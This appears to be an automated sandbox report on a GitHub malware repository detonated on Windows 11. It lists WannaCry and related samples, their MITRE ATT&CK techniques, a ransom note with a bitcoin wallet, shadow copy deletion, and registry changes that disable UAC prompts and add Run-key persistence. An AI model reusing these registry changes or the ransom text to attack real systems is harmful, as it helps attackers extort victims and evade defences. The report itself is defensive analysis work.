wannacry | hxxps://github[.]com/NotReal96/Malware/blob/master/MrsMajor[.]md

Analysis

max time kernel
646s
max time network
653s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
22/12/2024, 20:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/NotReal96/Malware/blob/master/MrsMajor.md

Score

10^/10

wannacry agilenet defense_evasion discovery evasion execution impact persistence ransomware spyware stealer trojan upx worm

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\WannaCry\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	wscript.exe

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Wannacry family
wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Downloads MZ/PE file

Drops startup file 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD84A3.tmp	WannaCrypt0r.exe

Executes dropped EXE 63 IoCs

pid	Process
2116	NRVP.exe
572	WannaCrypt0r.exe
4980	taskdl.exe
5008	@[email protected]
872	@[email protected]
4840	taskhsvc.exe
4524	WannaCrypt0r.exe
1008	WannaCrypt0r.exe
1672	taskdl.exe
952	taskse.exe
2728	@[email protected]
1144	taskdl.exe
2560	taskse.exe
3152	@[email protected]
4784	taskse.exe
4576	@[email protected]
1536	taskdl.exe
4512	taskse.exe
4208	@[email protected]
3636	taskdl.exe
2616	taskse.exe
4876	@[email protected]
2328	taskdl.exe
3944	taskse.exe
616	@[email protected]
5112	taskdl.exe
2056	taskse.exe
1388	@[email protected]
1880	taskdl.exe
1256	NRVP (2).exe
3556	taskse.exe
3836	@[email protected]
4056	taskdl.exe
816	taskse.exe
2356	@[email protected]
2068	taskdl.exe
2456	MrsMajor 3.0.exe
2760	eulascr.exe
840	taskse.exe
4884	@[email protected]
2072	taskdl.exe
3772	taskse.exe
3748	@[email protected]
1164	taskdl.exe
2404	taskse.exe
3044	@[email protected]
3996	taskdl.exe
2740	@[email protected]
1932	taskse.exe
3136	taskdl.exe
3240	MLG.exe
2136	taskse.exe
2340	@[email protected]
1308	taskdl.exe
1784	taskse.exe
2760	@[email protected]
1488	taskdl.exe
2328	taskse.exe
1388	@[email protected]
756	taskdl.exe
4884	taskse.exe
2064	@[email protected]
3004	taskdl.exe

Loads dropped DLL 8 IoCs

pid	Process
4840	taskhsvc.exe
4840	taskhsvc.exe
4840	taskhsvc.exe
4840	taskhsvc.exe
4840	taskhsvc.exe
4840	taskhsvc.exe
4840	taskhsvc.exe
2760	eulascr.exe

Modifies file permissions 1 TTPs 3 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3404	icacls.exe
3008	icacls.exe
1964	icacls.exe

Obfuscated with Agile.Net obfuscator 1 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral1/memory/2760-2852-0x00000000003D0000-0x00000000003FA000-memory.dmp	agile_net

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\bgesnwjhsz761 = "\"C:\\Users\\Admin\\Downloads\\WannaCry\\tasksche.exe\""	reg.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

flow	ioc
39	drive.google.com
40	drive.google.com
114	drive.google.com
139	drive.google.com
16	camo.githubusercontent.com
16	drive.google.com
26	camo.githubusercontent.com
28	camo.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 4 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.bmp"	MLG.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	WannaCrypt0r.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002abda-223.dat	upx
behavioral1/memory/2116-237-0x00007FF606C30000-0x00007FF606C3C000-memory.dmp	upx
behavioral1/memory/2116-250-0x00007FF606C30000-0x00007FF606C3C000-memory.dmp	upx
behavioral1/memory/1256-2553-0x00007FF7AB740000-0x00007FF7AB74C000-memory.dmp	upx
behavioral1/memory/1256-2557-0x00007FF7AB740000-0x00007FF7AB74C000-memory.dmp	upx

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 2 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\NRVP.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\NRVP (2).exe:Zone.Identifier	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WannaCrypt0r.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhsvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WannaCrypt0r.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WannaCrypt0r.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies Control Panel 2 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Desktop\WallpaperStyle = "2"	MLG.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Desktop\TileWallpaper = "0"	MLG.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	NRVP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\NRVP.exe = "11000"	NRVP.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	NRVP (2).exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\NRVP (2).exe = "11000"	NRVP (2).exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings	msedge.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
3820	reg.exe

NTFS ADS 8 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\WannaCry.7z:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\NRVP.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 856037.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\MrsMajor 3.0.7z:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 882554.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\NRVP (2).exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\MLG.rar:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 667507.crdownload:SmartScreen	msedge.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3588	POWERPNT.EXE

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
4572	msedge.exe
4572	msedge.exe
2308	msedge.exe
2308	msedge.exe
792	identity_helper.exe
792	identity_helper.exe
4904	msedge.exe
4904	msedge.exe
2076	msedge.exe
2076	msedge.exe
3424	msedge.exe
3424	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
4840	taskhsvc.exe
4840	taskhsvc.exe
4840	taskhsvc.exe
4840	taskhsvc.exe
4840	taskhsvc.exe
4840	taskhsvc.exe
4768	msedge.exe
4768	msedge.exe
2560	msedge.exe
2560	msedge.exe
436	msedge.exe
436	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2728	@[email protected]

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 30 IoCs

pid	Process
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	2888	7zG.exe
Token: 35	2888	7zG.exe
Token: SeSecurityPrivilege	2888	7zG.exe
Token: SeSecurityPrivilege	2888	7zG.exe
Token: SeRestorePrivilege	4736	7zG.exe
Token: 35	4736	7zG.exe
Token: SeSecurityPrivilege	4736	7zG.exe
Token: SeSecurityPrivilege	4736	7zG.exe
Token: SeIncreaseQuotaPrivilege	3920	WMIC.exe
Token: SeSecurityPrivilege	3920	WMIC.exe
Token: SeTakeOwnershipPrivilege	3920	WMIC.exe
Token: SeLoadDriverPrivilege	3920	WMIC.exe
Token: SeSystemProfilePrivilege	3920	WMIC.exe
Token: SeSystemtimePrivilege	3920	WMIC.exe
Token: SeProfSingleProcessPrivilege	3920	WMIC.exe
Token: SeIncBasePriorityPrivilege	3920	WMIC.exe
Token: SeCreatePagefilePrivilege	3920	WMIC.exe
Token: SeBackupPrivilege	3920	WMIC.exe
Token: SeRestorePrivilege	3920	WMIC.exe
Token: SeShutdownPrivilege	3920	WMIC.exe
Token: SeDebugPrivilege	3920	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3920	WMIC.exe
Token: SeRemoteShutdownPrivilege	3920	WMIC.exe
Token: SeUndockPrivilege	3920	WMIC.exe
Token: SeManageVolumePrivilege	3920	WMIC.exe
Token: 33	3920	WMIC.exe
Token: 34	3920	WMIC.exe
Token: 35	3920	WMIC.exe
Token: 36	3920	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3920	WMIC.exe
Token: SeSecurityPrivilege	3920	WMIC.exe
Token: SeTakeOwnershipPrivilege	3920	WMIC.exe
Token: SeLoadDriverPrivilege	3920	WMIC.exe
Token: SeSystemProfilePrivilege	3920	WMIC.exe
Token: SeSystemtimePrivilege	3920	WMIC.exe
Token: SeProfSingleProcessPrivilege	3920	WMIC.exe
Token: SeIncBasePriorityPrivilege	3920	WMIC.exe
Token: SeCreatePagefilePrivilege	3920	WMIC.exe
Token: SeBackupPrivilege	3920	WMIC.exe
Token: SeRestorePrivilege	3920	WMIC.exe
Token: SeShutdownPrivilege	3920	WMIC.exe
Token: SeDebugPrivilege	3920	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3920	WMIC.exe
Token: SeRemoteShutdownPrivilege	3920	WMIC.exe
Token: SeUndockPrivilege	3920	WMIC.exe
Token: SeManageVolumePrivilege	3920	WMIC.exe
Token: 33	3920	WMIC.exe
Token: 34	3920	WMIC.exe
Token: 35	3920	WMIC.exe
Token: 36	3920	WMIC.exe
Token: SeBackupPrivilege	1520	vssvc.exe
Token: SeRestorePrivilege	1520	vssvc.exe
Token: SeAuditPrivilege	1520	vssvc.exe
Token: SeTcbPrivilege	952	taskse.exe
Token: SeTcbPrivilege	952	taskse.exe
Token: SeTcbPrivilege	2560	taskse.exe
Token: SeTcbPrivilege	2560	taskse.exe
Token: SeTcbPrivilege	4784	taskse.exe
Token: SeTcbPrivilege	4784	taskse.exe
Token: SeTcbPrivilege	4512	taskse.exe
Token: SeTcbPrivilege	4512	taskse.exe
Token: SeTcbPrivilege	2616	taskse.exe
Token: SeTcbPrivilege	2616	taskse.exe
Token: SeTcbPrivilege	3944	taskse.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2888	7zG.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
4736	7zG.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe
2308	msedge.exe

Suspicious use of SetWindowsHookEx 33 IoCs

pid	Process
2116	NRVP.exe
2116	NRVP.exe
5008	@[email protected]
5008	@[email protected]
872	@[email protected]
872	@[email protected]
2728	@[email protected]
2728	@[email protected]
3152	@[email protected]
4576	@[email protected]
4208	@[email protected]
3588	POWERPNT.EXE
3588	POWERPNT.EXE
3588	POWERPNT.EXE
3588	POWERPNT.EXE
3588	POWERPNT.EXE
4876	@[email protected]
616	@[email protected]
1388	@[email protected]
1256	NRVP (2).exe
1256	NRVP (2).exe
3836	@[email protected]
2356	@[email protected]
2356	@[email protected]
2456	MrsMajor 3.0.exe
4884	@[email protected]
3748	@[email protected]
3044	@[email protected]
2740	@[email protected]
2340	@[email protected]
2760	@[email protected]
1388	@[email protected]
2064	@[email protected]

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2308 wrote to memory of 1444	2308	msedge.exe	77
PID 2308 wrote to memory of 1444	2308	msedge.exe	77
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 3320	2308	msedge.exe	78
PID 2308 wrote to memory of 4572	2308	msedge.exe	79
PID 2308 wrote to memory of 4572	2308	msedge.exe	79
PID 2308 wrote to memory of 1352	2308	msedge.exe	80
PID 2308 wrote to memory of 1352	2308	msedge.exe	80
PID 2308 wrote to memory of 1352	2308	msedge.exe	80
PID 2308 wrote to memory of 1352	2308	msedge.exe	80
PID 2308 wrote to memory of 1352	2308	msedge.exe	80
PID 2308 wrote to memory of 1352	2308	msedge.exe	80
PID 2308 wrote to memory of 1352	2308	msedge.exe	80
PID 2308 wrote to memory of 1352	2308	msedge.exe	80
PID 2308 wrote to memory of 1352	2308	msedge.exe	80
PID 2308 wrote to memory of 1352	2308	msedge.exe	80
PID 2308 wrote to memory of 1352	2308	msedge.exe	80
PID 2308 wrote to memory of 1352	2308	msedge.exe	80
PID 2308 wrote to memory of 1352	2308	msedge.exe	80
PID 2308 wrote to memory of 1352	2308	msedge.exe	80
PID 2308 wrote to memory of 1352	2308	msedge.exe	80
PID 2308 wrote to memory of 1352	2308	msedge.exe	80
PID 2308 wrote to memory of 1352	2308	msedge.exe	80
PID 2308 wrote to memory of 1352	2308	msedge.exe	80
PID 2308 wrote to memory of 1352	2308	msedge.exe	80
PID 2308 wrote to memory of 1352	2308	msedge.exe	80

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	wscript.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2776	attrib.exe
4152	attrib.exe
3956	attrib.exe
4928	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
